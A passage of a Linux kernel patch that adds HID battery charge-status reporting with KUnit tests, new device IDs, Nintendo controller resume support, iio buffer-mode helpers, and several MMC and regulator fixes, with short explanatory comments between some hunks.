+@@ -1263,6 +1263,7 @@ config HID_MCP2221
+ config HID_KUNIT_TEST
+ 	tristate "KUnit tests for HID" if !KUNIT_ALL_TESTS
+ 	depends on KUNIT
++	depends on HID_BATTERY_STRENGTH
+ 	depends on HID_UCLOGIC
+ 	default KUNIT_ALL_TESTS
+ 	help
+diff --git a/drivers/hid/hid-holtek-kbd.c b/drivers/hid/hid-holtek-kbd.c
+index 403506b9697e7..b346d68a06f5a 100644
+--- a/drivers/hid/hid-holtek-kbd.c
++++ b/drivers/hid/hid-holtek-kbd.c
+@@ -130,6 +130,10 @@ static int holtek_kbd_input_event(struct input_dev *dev, unsigned int type,
+ 		return -ENODEV;
+ 
+ 	boot_hid = usb_get_intfdata(boot_interface);
++	if (list_empty(&boot_hid->inputs)) {
++		hid_err(hid, "no inputs found\n");
++		return -ENODEV;
++	}
+ 	boot_hid_input = list_first_entry(&boot_hid->inputs,
+ 		struct hid_input, list);
+ 
+diff --git a/drivers/hid/hid-input-test.c b/drivers/hid/hid-input-test.c
+new file mode 100644
+index 0000000000000..77c2d45ac62a7
+--- /dev/null
++++ b/drivers/hid/hid-input-test.c
+@@ -0,0 +1,80 @@
++// SPDX-License-Identifier: GPL-2.0+
++/*
++ *  HID to Linux Input mapping
++ *
++ *  Copyright (c) 2022 José Expósito <jose.exposito89@gmail.com>
++ */
++
++#include <kunit/test.h>
++
++static void hid_test_input_set_battery_charge_status(struct kunit *test)
++{
++	struct hid_device *dev;
++	bool handled;
++
++	dev = kunit_kzalloc(test, sizeof(*dev), GFP_KERNEL);
++	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, dev);
++
++	handled = hidinput_set_battery_charge_status(dev, HID_DG_HEIGHT, 0);
++	KUNIT_EXPECT_FALSE(test, handled);
++	KUNIT_EXPECT_EQ(test, dev->battery_charge_status, POWER_SUPPLY_STATUS_UNKNOWN);
++
++	handled = hidinput_set_battery_charge_status(dev, HID_BAT_CHARGING, 0);
++	KUNIT_EXPECT_TRUE(test, handled);
++	KUNIT_EXPECT_EQ(test, dev->battery_charge_status, POWER_SUPPLY_STATUS_DISCHARGING);
++
++	handled = hidinput_set_battery_charge_status(dev, HID_BAT_CHARGING, 1);
++	KUNIT_EXPECT_TRUE(test, handled);
++	KUNIT_EXPECT_EQ(test, dev->battery_charge_status, POWER_SUPPLY_STATUS_CHARGING);
++}
++
++static void hid_test_input_get_battery_property(struct kunit *test)
++{
++	struct power_supply *psy;
++	struct hid_device *dev;
++	union power_supply_propval val;
++	int ret;
++
++	dev = kunit_kzalloc(test, sizeof(*dev), GFP_KERNEL);
++	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, dev);
++	dev->battery_avoid_query = true;
++
++	psy = kunit_kzalloc(test, sizeof(*psy), GFP_KERNEL);
++	KUNIT_ASSERT_NOT_ERR_OR_NULL(test, psy);
++	psy->drv_data = dev;
++
++	dev->battery_status = HID_BATTERY_UNKNOWN;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_CHARGING;
++	ret = hidinput_get_battery_property(psy, POWER_SUPPLY_PROP_STATUS, &val);
++	KUNIT_EXPECT_EQ(test, ret, 0);
++	KUNIT_EXPECT_EQ(test, val.intval, POWER_SUPPLY_STATUS_UNKNOWN);
++
++	dev->battery_status = HID_BATTERY_REPORTED;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_CHARGING;
++	ret = hidinput_get_battery_property(psy, POWER_SUPPLY_PROP_STATUS, &val);
++	KUNIT_EXPECT_EQ(test, ret, 0);
++	KUNIT_EXPECT_EQ(test, val.intval, POWER_SUPPLY_STATUS_CHARGING);
++
++	dev->battery_status = HID_BATTERY_REPORTED;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_DISCHARGING;
++	ret = hidinput_get_battery_property(psy, POWER_SUPPLY_PROP_STATUS, &val);
++	KUNIT_EXPECT_EQ(test, ret, 0);
++	KUNIT_EXPECT_EQ(test, val.intval, POWER_SUPPLY_STATUS_DISCHARGING);
++}
++
++static struct kunit_case hid_input_tests[] = {
++	KUNIT_CASE(hid_test_input_set_battery_charge_status),
++	KUNIT_CASE(hid_test_input_get_battery_property),
++	{ }
++};
++
++static struct kunit_suite hid_input_test_suite = {
++	.name = "hid_input",
++	.test_cases = hid_input_tests,
++};
++
++kunit_test_suite(hid_input_test_suite);
++
++MODULE_DESCRIPTION("HID input KUnit tests");
++MODULE_LICENSE("GPL");
++MODULE_AUTHOR("José Expósito <jose.exposito89@gmail.com>");
+diff --git a/drivers/hid/hid-input.c b/drivers/hid/hid-input.c
+index 77ee5e01e6111..4ba5df3c1e039 100644
+--- a/drivers/hid/hid-input.c
++++ b/drivers/hid/hid-input.c
+@@ -492,7 +492,7 @@ static int hidinput_get_battery_property(struct power_supply *psy,
+ 		if (dev->battery_status == HID_BATTERY_UNKNOWN)
+ 			val->intval = POWER_SUPPLY_STATUS_UNKNOWN;
+ 		else
+-			val->intval = POWER_SUPPLY_STATUS_DISCHARGING;
++			val->intval = dev->battery_charge_status;
+ 		break;
+ 
+ 	case POWER_SUPPLY_PROP_SCOPE:
+@@ -560,6 +560,7 @@ static int hidinput_setup_battery(struct hid_device *dev, unsigned report_type,
+ 	dev->battery_max = max;
+ 	dev->battery_report_type = report_type;
+ 	dev->battery_report_id = field->report->id;
++	dev->battery_charge_status = POWER_SUPPLY_STATUS_DISCHARGING;
+ 
+ 	/*
+ 	 * Stylus is normally not connected to the device and thus we
+@@ -626,6 +627,20 @@ static void hidinput_update_battery(struct hid_device *dev, int value)
+ 		power_supply_changed(dev->battery);
+ 	}
+ }
++
++static bool hidinput_set_battery_charge_status(struct hid_device *dev,
++					       unsigned int usage, int value)
++{
++	switch (usage) {
++	case HID_BAT_CHARGING:
++		dev->battery_charge_status = value ?
++					     POWER_SUPPLY_STATUS_CHARGING :
++					     POWER_SUPPLY_STATUS_DISCHARGING;
++		return true;
++	}
++
++	return false;
++}
+ #else  /* !CONFIG_HID_BATTERY_STRENGTH */
+ static int hidinput_setup_battery(struct hid_device *dev, unsigned report_type,
+ 				  struct hid_field *field, bool is_percentage)
+@@ -640,6 +655,12 @@ static void hidinput_cleanup_battery(struct hid_device *dev)
+ static void hidinput_update_battery(struct hid_device *dev, int value)
+ {
+ }
++
++static bool hidinput_set_battery_charge_status(struct hid_device *dev,
++					       unsigned int usage, int value)
++{
++	return false;
++}
+ #endif	/* CONFIG_HID_BATTERY_STRENGTH */
+ 
+ static bool hidinput_field_in_collection(struct hid_device *device, struct hid_field *field,
+@@ -1239,6 +1260,9 @@ static void hidinput_configure_usage(struct hid_input *hidinput, struct hid_fiel
+ 			hidinput_setup_battery(device, HID_INPUT_REPORT, field, true);
+ 			usage->type = EV_PWR;
+ 			return;
++		case HID_BAT_CHARGING:
++			usage->type = EV_PWR;
++			return;
+ 		}
+ 		goto unknown;
+ 
+@@ -1481,7 +1505,11 @@ void hidinput_hid_event(struct hid_device *hid, struct hid_field *field, struct
+ 		return;
+ 
+ 	if (usage->type == EV_PWR) {
+-		hidinput_update_battery(hid, value);
++		bool handled = hidinput_set_battery_charge_status(hid, usage->hid, value);
++
++		if (!handled)
++			hidinput_update_battery(hid, value);
++
+ 		return;
+ 	}
+ 
+@@ -2346,3 +2374,7 @@ void hidinput_disconnect(struct hid_device *hid)
+ 	cancel_work_sync(&hid->led_work);
+ }
+ EXPORT_SYMBOL_GPL(hidinput_disconnect);
++
++#ifdef CONFIG_HID_KUNIT_TEST
++#include "hid-input-test.c"
++#endif
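
The #include at the end of hid-input.c is the usual KUnit idiom for exercising static functions: the test file is compiled into the same translation unit as the driver, so the tests can call statics such as hidinput_set_battery_charge_status() directly. A minimal sketch of the idiom, with hypothetical foo names:

    /* foo.c -- sketch of the KUnit static-function test idiom (names hypothetical) */
    static int foo_double(int x)
    {
            return x * 2;           /* static: invisible to other translation units */
    }

    /* ... rest of the driver ... */

    #ifdef CONFIG_FOO_KUNIT_TEST
    #include "foo-test.c"           /* tests build in this unit and may call foo_double() */
    #endif
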
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index fb427391c3b86..8d0dad12b2d37 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4427,6 +4427,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb008) },
+ 	{ /* MX Master mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb012) },
++	{ /* M720 Triathlon mouse over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb015) },
+ 	{ /* MX Ergo trackball over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01d) },
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01e) },
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 521b2ffb42449..8db4ae05febc8 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -2144,6 +2144,10 @@ static const struct hid_device_id mt_devices[] = {
+ 			USB_DEVICE_ID_MTP_STM)},
+ 
+ 	/* Synaptics devices */
++	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
++		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
++			USB_VENDOR_ID_SYNAPTICS, 0xcd7e) },
++
+ 	{ .driver_data = MT_CLS_WIN_8_FORCE_MULTI_INPUT,
+ 		HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8,
+ 			USB_VENDOR_ID_SYNAPTICS, 0xce08) },
+diff --git a/drivers/hid/hid-nintendo.c b/drivers/hid/hid-nintendo.c
+index 5bfc0c4504608..8a8a3dd8af0c1 100644
+--- a/drivers/hid/hid-nintendo.c
++++ b/drivers/hid/hid-nintendo.c
+@@ -2011,7 +2011,9 @@ static int joycon_read_info(struct joycon_ctlr *ctlr)
+ 	struct joycon_input_report *report;
+ 
+ 	req.subcmd_id = JC_SUBCMD_REQ_DEV_INFO;
++	mutex_lock(&ctlr->output_mutex);
+ 	ret = joycon_send_subcmd(ctlr, &req, 0, HZ);
++	mutex_unlock(&ctlr->output_mutex);
+ 	if (ret) {
+ 		hid_err(ctlr->hdev, "Failed to get joycon info; ret=%d\n", ret);
+ 		return ret;
+@@ -2040,6 +2042,85 @@ static int joycon_read_info(struct joycon_ctlr *ctlr)
+ 	return 0;
+ }
+ 
++static int joycon_init(struct hid_device *hdev)
++{
++	struct joycon_ctlr *ctlr = hid_get_drvdata(hdev);
++	int ret = 0;
++
++	mutex_lock(&ctlr->output_mutex);
++	/* if handshake command fails, assume ble pro controller */
++	if ((jc_type_is_procon(ctlr) || jc_type_is_chrggrip(ctlr)) &&
++	    !joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ)) {
++		hid_dbg(hdev, "detected USB controller\n");
++		/* set baudrate for improved latency */
++		ret = joycon_send_usb(ctlr, JC_USB_CMD_BAUDRATE_3M, HZ);
++		if (ret) {
++			hid_err(hdev, "Failed to set baudrate; ret=%d\n", ret);
++			goto out_unlock;
++		}
++		/* handshake */
++		ret = joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ);
++		if (ret) {
++			hid_err(hdev, "Failed handshake; ret=%d\n", ret);
++			goto out_unlock;
++		}
++		/*
++		 * Set no timeout (to keep controller in USB mode).
++		 * This doesn't send a response, so ignore the timeout.
++		 */
++		joycon_send_usb(ctlr, JC_USB_CMD_NO_TIMEOUT, HZ/10);
++	} else if (jc_type_is_chrggrip(ctlr)) {
++		hid_err(hdev, "Failed charging grip handshake\n");
++		ret = -ETIMEDOUT;
++		goto out_unlock;
++	}
++
++	/* get controller calibration data, and parse it */
++	ret = joycon_request_calibration(ctlr);
++	if (ret) {
++		/*
++		 * We can function with default calibration, but it may be
++		 * inaccurate. Provide a warning, and continue on.
++		 */
++		hid_warn(hdev, "Analog stick positions may be inaccurate\n");
++	}
++
++	/* get IMU calibration data, and parse it */
++	ret = joycon_request_imu_calibration(ctlr);
++	if (ret) {
++		/*
++		 * We can function with default calibration, but it may be
++		 * inaccurate. Provide a warning, and continue on.
++		 */
++		hid_warn(hdev, "Unable to read IMU calibration data\n");
++	}
++
++	/* Set the reporting mode to 0x30, which is the full report mode */
++	ret = joycon_set_report_mode(ctlr);
++	if (ret) {
++		hid_err(hdev, "Failed to set report mode; ret=%d\n", ret);
++		goto out_unlock;
++	}
++
++	/* Enable rumble */
++	ret = joycon_enable_rumble(ctlr);
++	if (ret) {
++		hid_err(hdev, "Failed to enable rumble; ret=%d\n", ret);
++		goto out_unlock;
++	}
++
++	/* Enable the IMU */
++	ret = joycon_enable_imu(ctlr);
++	if (ret) {
++		hid_err(hdev, "Failed to enable the IMU; ret=%d\n", ret);
++		goto out_unlock;
++	}
++
++out_unlock:
++	mutex_unlock(&ctlr->output_mutex);
++	return ret;
++}
++
+ /* Common handler for parsing inputs */
+ static int joycon_ctlr_read_handler(struct joycon_ctlr *ctlr, u8 *data,
+ 							      int size)
+@@ -2171,85 +2252,19 @@ static int nintendo_hid_probe(struct hid_device *hdev,
+ 
+ 	hid_device_io_start(hdev);
+ 
+-	/* Initialize the controller */
+-	mutex_lock(&ctlr->output_mutex);
+-	/* if handshake command fails, assume ble pro controller */
+-	if ((jc_type_is_procon(ctlr) || jc_type_is_chrggrip(ctlr)) &&
+-	    !joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ)) {
+-		hid_dbg(hdev, "detected USB controller\n");
+-		/* set baudrate for improved latency */
+-		ret = joycon_send_usb(ctlr, JC_USB_CMD_BAUDRATE_3M, HZ);
+-		if (ret) {
+-			hid_err(hdev, "Failed to set baudrate; ret=%d\n", ret);
+-			goto err_mutex;
+-		}
+-		/* handshake */
+-		ret = joycon_send_usb(ctlr, JC_USB_CMD_HANDSHAKE, HZ);
+-		if (ret) {
+-			hid_err(hdev, "Failed handshake; ret=%d\n", ret);
+-			goto err_mutex;
+-		}
+-		/*
+-		 * Set no timeout (to keep controller in USB mode).
+-		 * This doesn't send a response, so ignore the timeout.
+-		 */
+-		joycon_send_usb(ctlr, JC_USB_CMD_NO_TIMEOUT, HZ/10);
+-	} else if (jc_type_is_chrggrip(ctlr)) {
+-		hid_err(hdev, "Failed charging grip handshake\n");
+-		ret = -ETIMEDOUT;
+-		goto err_mutex;
+-	}
+-
+-	/* get controller calibration data, and parse it */
+-	ret = joycon_request_calibration(ctlr);
++	ret = joycon_init(hdev);
+ 	if (ret) {
+-		/*
+-		 * We can function with default calibration, but it may be
+-		 * inaccurate. Provide a warning, and continue on.
+-		 */
+-		hid_warn(hdev, "Analog stick positions may be inaccurate\n");
+-	}
+-
+-	/* get IMU calibration data, and parse it */
+-	ret = joycon_request_imu_calibration(ctlr);
+-	if (ret) {
+-		/*
+-		 * We can function with default calibration, but it may be
+-		 * inaccurate. Provide a warning, and continue on.
+-		 */
+-		hid_warn(hdev, "Unable to read IMU calibration data\n");
+-	}
+-
+-	/* Set the reporting mode to 0x30, which is the full report mode */
+-	ret = joycon_set_report_mode(ctlr);
+-	if (ret) {
+-		hid_err(hdev, "Failed to set report mode; ret=%d\n", ret);
+-		goto err_mutex;
+-	}
+-
+-	/* Enable rumble */
+-	ret = joycon_enable_rumble(ctlr);
+-	if (ret) {
+-		hid_err(hdev, "Failed to enable rumble; ret=%d\n", ret);
+-		goto err_mutex;
+-	}
+-
+-	/* Enable the IMU */
+-	ret = joycon_enable_imu(ctlr);
+-	if (ret) {
+-		hid_err(hdev, "Failed to enable the IMU; ret=%d\n", ret);
+-		goto err_mutex;
++		hid_err(hdev, "Failed to initialize controller; ret=%d\n", ret);
++		goto err_close;
+ 	}
+ 
+ 	ret = joycon_read_info(ctlr);
+ 	if (ret) {
+ 		hid_err(hdev, "Failed to retrieve controller info; ret=%d\n",
+ 			ret);
+-		goto err_mutex;
++		goto err_close;
+ 	}
+ 
+-	mutex_unlock(&ctlr->output_mutex);
+-
+ 	/* Initialize the leds */
+ 	ret = joycon_leds_create(ctlr);
+ 	if (ret) {
+@@ -2275,8 +2290,6 @@ static int nintendo_hid_probe(struct hid_device *hdev,
+ 	hid_dbg(hdev, "probe - success\n");
+ 	return 0;
+ 
+-err_mutex:
+-	mutex_unlock(&ctlr->output_mutex);
+ err_close:
+ 	hid_hw_close(hdev);
+ err_stop:
+@@ -2306,6 +2319,20 @@ static void nintendo_hid_remove(struct hid_device *hdev)
+ 	hid_hw_stop(hdev);
+ }
+ 
++#ifdef CONFIG_PM
++
++static int nintendo_hid_resume(struct hid_device *hdev)
++{
++	int ret = joycon_init(hdev);
++
++	if (ret)
++		hid_err(hdev, "Failed to restore controller after resume");
++
++	return ret;
++}
++
++#endif
++
+ static const struct hid_device_id nintendo_hid_devices[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_NINTENDO,
+ 			 USB_DEVICE_ID_NINTENDO_PROCON) },
+@@ -2327,6 +2354,10 @@ static struct hid_driver nintendo_hid_driver = {
+ 	.probe		= nintendo_hid_probe,
+ 	.remove		= nintendo_hid_remove,
+ 	.raw_event	= nintendo_hid_event,
++
++#ifdef CONFIG_PM
++	.resume		= nintendo_hid_resume,
++#endif
+ };
+ module_hid_driver(nintendo_hid_driver);
+ 
+diff --git a/drivers/i2c/i2c-mux.c b/drivers/i2c/i2c-mux.c
+index 313904be5f3bd..57ff09f18c371 100644
+--- a/drivers/i2c/i2c-mux.c
++++ b/drivers/i2c/i2c-mux.c
+@@ -341,7 +341,7 @@ int i2c_mux_add_adapter(struct i2c_mux_core *muxc,
+ 		priv->adap.lock_ops = &i2c_parent_lock_ops;
+ 
+ 	/* Sanity check on class */
+-	if (i2c_mux_parent_classes(parent) & class)
++	if (i2c_mux_parent_classes(parent) & class & ~I2C_CLASS_DEPRECATED)
+ 		dev_err(&parent->dev,
+ 			"Segment %d behind mux can't share classes with ancestors\n",
+ 			chan_id);
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index 80eff7090f14a..faf680140c178 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -177,7 +177,7 @@ struct ad7192_chip_info {
+ struct ad7192_state {
+ 	const struct ad7192_chip_info	*chip_info;
+ 	struct regulator		*avdd;
+-	struct regulator		*dvdd;
++	struct regulator		*vref;
+ 	struct clk			*mclk;
+ 	u16				int_vref_mv;
+ 	u32				fclk;
+@@ -1011,24 +1011,34 @@ static int ad7192_probe(struct spi_device *spi)
+ 	if (ret)
+ 		return ret;
+ 
+-	st->dvdd = devm_regulator_get(&spi->dev, "dvdd");
+-	if (IS_ERR(st->dvdd))
+-		return PTR_ERR(st->dvdd);
++	ret = devm_regulator_get_enable(&spi->dev, "dvdd");
++	if (ret)
++		return dev_err_probe(&spi->dev, ret, "Failed to enable specified DVdd supply\n");
+ 
+-	ret = regulator_enable(st->dvdd);
+-	if (ret) {
+-		dev_err(&spi->dev, "Failed to enable specified DVdd supply\n");
+-		return ret;
+-	}
++	st->vref = devm_regulator_get_optional(&spi->dev, "vref");
++	if (IS_ERR(st->vref)) {
++		if (PTR_ERR(st->vref) != -ENODEV)
++			return PTR_ERR(st->vref);
+ 
+-	ret = devm_add_action_or_reset(&spi->dev, ad7192_reg_disable, st->dvdd);
+-	if (ret)
+-		return ret;
++		ret = regulator_get_voltage(st->avdd);
++		if (ret < 0)
++			return dev_err_probe(&spi->dev, ret,
++					     "Device tree error, AVdd voltage undefined\n");
++	} else {
++		ret = regulator_enable(st->vref);
++		if (ret) {
++			dev_err(&spi->dev, "Failed to enable specified Vref supply\n");
++			return ret;
++		}
+ 
+-	ret = regulator_get_voltage(st->avdd);
+-	if (ret < 0) {
+-		dev_err(&spi->dev, "Device tree error, reference voltage undefined\n");
+-		return ret;
++		ret = devm_add_action_or_reset(&spi->dev, ad7192_reg_disable, st->vref);
++		if (ret)
++			return ret;
++
++		ret = regulator_get_voltage(st->vref);
++		if (ret < 0)
++			return dev_err_probe(&spi->dev, ret,
++					     "Device tree error, Vref voltage undefined\n");
+ 	}
+ 	st->int_vref_mv = ret / 1000;
+ 
+diff --git a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+index d98f7e4d202c1..1ddce991fb3f4 100644
+--- a/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
++++ b/drivers/iio/common/cros_ec_sensors/cros_ec_sensors_core.c
+@@ -190,8 +190,11 @@ int cros_ec_sensors_push_data(struct iio_dev *indio_dev,
+ 	/*
+ 	 * Ignore samples if the buffer is not set: it is needed if the ODR is
+ 	 * set but the buffer is not enabled yet.
++	 *
++	 * Note: iio_device_claim_buffer_mode() returns -EBUSY if the buffer
++	 * is not enabled.
+ 	 */
+-	if (!iio_buffer_enabled(indio_dev))
++	if (iio_device_claim_buffer_mode(indio_dev) < 0)
+ 		return 0;
+ 
+ 	out = (s16 *)st->samples;
+@@ -210,6 +213,7 @@ int cros_ec_sensors_push_data(struct iio_dev *indio_dev,
+ 	iio_push_to_buffers_with_timestamp(indio_dev, st->samples,
+ 					   timestamp + delta);
+ 
++	iio_device_release_buffer_mode(indio_dev);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(cros_ec_sensors_push_data);
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index f3f8392623a46..c9614982cb671 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -2084,6 +2084,44 @@ void iio_device_release_direct_mode(struct iio_dev *indio_dev)
+ }
+ EXPORT_SYMBOL_GPL(iio_device_release_direct_mode);
+ 
++/**
++ * iio_device_claim_buffer_mode - Keep device in buffer mode
++ * @indio_dev:	the iio_dev associated with the device
++ *
++ * If the device is in buffer mode it is guaranteed to stay
++ * that way until iio_device_release_buffer_mode() is called.
++ *
++ * Use with iio_device_release_buffer_mode().
++ *
++ * Returns: 0 on success, -EBUSY on failure.
++ */
++int iio_device_claim_buffer_mode(struct iio_dev *indio_dev)
++{
++	mutex_lock(&indio_dev->mlock);
++
++	if (iio_buffer_enabled(indio_dev))
++		return 0;
++
++	mutex_unlock(&indio_dev->mlock);
++	return -EBUSY;
++}
++EXPORT_SYMBOL_GPL(iio_device_claim_buffer_mode);
++
++/**
++ * iio_device_release_buffer_mode - releases claim on buffer mode
++ * @indio_dev:	the iio_dev associated with the device
++ *
++ * Release the claim. Device is no longer guaranteed to stay
++ * in buffer mode.
++ *
++ * Use with iio_device_claim_buffer_mode().
++ */
++void iio_device_release_buffer_mode(struct iio_dev *indio_dev)
++{
++	mutex_unlock(&indio_dev->mlock);
++}
++EXPORT_SYMBOL_GPL(iio_device_release_buffer_mode);
++
+ /**
+  * iio_device_get_current_mode() - helper function providing read-only access to
+  *				   the opaque @currentmode variable
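
The new helpers mirror the existing direct-mode pair: a successful claim returns with the device lock held, so every claim must be balanced by a release. A minimal usage sketch (foo_push_samples() and its arguments are placeholders, not from this patch):

    /* Sketch: push samples only while the buffer is guaranteed to stay enabled */
    static int foo_push_samples(struct iio_dev *indio_dev, s16 *samples, s64 ts)
    {
            if (iio_device_claim_buffer_mode(indio_dev) < 0)
                    return 0;       /* buffer not enabled: drop the sample */

            iio_push_to_buffers_with_timestamp(indio_dev, samples, ts);
            iio_device_release_buffer_mode(indio_dev);
            return 0;
    }

This is exactly the shape of the cros_ec_sensors_push_data() change earlier in this patch.
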
+diff --git a/drivers/mmc/core/mmc.c b/drivers/mmc/core/mmc.c
+index 89cd48fcec79f..4a4bab9aa7263 100644
+--- a/drivers/mmc/core/mmc.c
++++ b/drivers/mmc/core/mmc.c
+@@ -104,7 +104,7 @@ static int mmc_decode_cid(struct mmc_card *card)
+ 	case 3: /* MMC v3.1 - v3.3 */
+ 	case 4: /* MMC v4 */
+ 		card->cid.manfid	= UNSTUFF_BITS(resp, 120, 8);
+-		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 16);
++		card->cid.oemid		= UNSTUFF_BITS(resp, 104, 8);
+ 		card->cid.prod_name[0]	= UNSTUFF_BITS(resp, 96, 8);
+ 		card->cid.prod_name[1]	= UNSTUFF_BITS(resp, 88, 8);
+ 		card->cid.prod_name[2]	= UNSTUFF_BITS(resp, 80, 8);
+diff --git a/drivers/mmc/core/sdio.c b/drivers/mmc/core/sdio.c
+index f64b9ac76a5cd..5914516df2f7f 100644
+--- a/drivers/mmc/core/sdio.c
++++ b/drivers/mmc/core/sdio.c
+@@ -1089,8 +1089,14 @@ static int mmc_sdio_resume(struct mmc_host *host)
+ 		}
+ 		err = mmc_sdio_reinit_card(host);
+ 	} else if (mmc_card_wake_sdio_irq(host)) {
+-		/* We may have switched to 1-bit mode during suspend */
++		/*
++		 * We may have switched to 1-bit mode during suspend;
++		 * need to hold retuning, because tuning only supports
++		 * 4-bit or 8-bit mode.
++		 */
++		mmc_retune_hold_now(host);
+ 		err = sdio_enable_4bit_bus(host->card);
++		mmc_retune_release(host);
+ 	}
+ 
+ 	if (err)
+diff --git a/drivers/mmc/host/mtk-sd.c b/drivers/mmc/host/mtk-sd.c
+index 1a0d4dc24717c..70e414027155d 100644
+--- a/drivers/mmc/host/mtk-sd.c
++++ b/drivers/mmc/host/mtk-sd.c
+@@ -655,11 +655,11 @@ static void msdc_reset_hw(struct msdc_host *host)
+ 	u32 val;
+ 
+ 	sdr_set_bits(host->base + MSDC_CFG, MSDC_CFG_RST);
+-	readl_poll_timeout(host->base + MSDC_CFG, val, !(val & MSDC_CFG_RST), 0, 0);
++	readl_poll_timeout_atomic(host->base + MSDC_CFG, val, !(val & MSDC_CFG_RST), 0, 0);
+ 
+ 	sdr_set_bits(host->base + MSDC_FIFOCS, MSDC_FIFOCS_CLR);
+-	readl_poll_timeout(host->base + MSDC_FIFOCS, val,
+-			   !(val & MSDC_FIFOCS_CLR), 0, 0);
++	readl_poll_timeout_atomic(host->base + MSDC_FIFOCS, val,
++				  !(val & MSDC_FIFOCS_CLR), 0, 0);
+ 
+ 	val = readl(host->base + MSDC_INT);
+ 	writel(val, host->base + MSDC_INT);
+diff --git a/drivers/mmc/host/sdhci-pci-gli.c b/drivers/mmc/host/sdhci-pci-gli.c
+index 4d509f6561887..c580ba089a261 100644
+--- a/drivers/mmc/host/sdhci-pci-gli.c
++++ b/drivers/mmc/host/sdhci-pci-gli.c
+@@ -756,42 +756,6 @@ static u32 sdhci_gl9750_readl(struct sdhci_host *host, int reg)
+ 	return value;
+ }
+ 
+-#ifdef CONFIG_PM_SLEEP
+-static int sdhci_pci_gli_resume(struct sdhci_pci_chip *chip)
+-{
+-	struct sdhci_pci_slot *slot = chip->slots[0];
+-
+-	pci_free_irq_vectors(slot->chip->pdev);
+-	gli_pcie_enable_msi(slot);
+-
+-	return sdhci_pci_resume_host(chip);
+-}
+-
+-static int sdhci_cqhci_gli_resume(struct sdhci_pci_chip *chip)
+-{
+-	struct sdhci_pci_slot *slot = chip->slots[0];
+-	int ret;
+-
+-	ret = sdhci_pci_gli_resume(chip);
+-	if (ret)
+-		return ret;
+-
+-	return cqhci_resume(slot->host->mmc);
+-}
+-
+-static int sdhci_cqhci_gli_suspend(struct sdhci_pci_chip *chip)
+-{
+-	struct sdhci_pci_slot *slot = chip->slots[0];
+-	int ret;
+-
+-	ret = cqhci_suspend(slot->host->mmc);
+-	if (ret)
+-		return ret;
+-
+-	return sdhci_suspend_host(slot->host);
+-}
+-#endif
+-
+ static void gl9763e_hs400_enhanced_strobe(struct mmc_host *mmc,
+ 					  struct mmc_ios *ios)
+ {
+@@ -1040,6 +1004,70 @@ static int gl9763e_runtime_resume(struct sdhci_pci_chip *chip)
+ }
+ #endif
+ 
++#ifdef CONFIG_PM_SLEEP
++static int sdhci_pci_gli_resume(struct sdhci_pci_chip *chip)
++{
++	struct sdhci_pci_slot *slot = chip->slots[0];
++
++	pci_free_irq_vectors(slot->chip->pdev);
++	gli_pcie_enable_msi(slot);
++
++	return sdhci_pci_resume_host(chip);
++}
++
++static int gl9763e_resume(struct sdhci_pci_chip *chip)
++{
++	struct sdhci_pci_slot *slot = chip->slots[0];
++	int ret;
++
++	ret = sdhci_pci_gli_resume(chip);
++	if (ret)
++		return ret;
++
++	ret = cqhci_resume(slot->host->mmc);
++	if (ret)
++		return ret;
++
++	/*
++	 * Disable LPM negotiation to bring device back in sync
++	 * with its runtime_pm state.
++	 */
++	gl9763e_set_low_power_negotiation(slot, false);
++
++	return 0;
++}
++
++static int gl9763e_suspend(struct sdhci_pci_chip *chip)
++{
++	struct sdhci_pci_slot *slot = chip->slots[0];
++	int ret;
++
++	/*
++	 * Certain SoCs can suspend only with the bus in low-
++	 * power state, notably x86 SoCs when using S0ix.
++	 * Re-enable LPM negotiation to allow the link to enter L1
++	 * and the system to suspend.
++	 */
++	gl9763e_set_low_power_negotiation(slot, true);
++
++	ret = cqhci_suspend(slot->host->mmc);
++	if (ret)
++		goto err_suspend;
++
++	ret = sdhci_suspend_host(slot->host);
++	if (ret)
++		goto err_suspend_host;
++
++	return 0;
++
++err_suspend_host:
++	cqhci_resume(slot->host->mmc);
++err_suspend:
++	gl9763e_set_low_power_negotiation(slot, false);
++	return ret;
++}
++#endif
++
+ static int gli_probe_slot_gl9763e(struct sdhci_pci_slot *slot)
+ {
+ 	struct pci_dev *pdev = slot->chip->pdev;
+@@ -1147,8 +1175,8 @@ const struct sdhci_pci_fixes sdhci_gl9763e = {
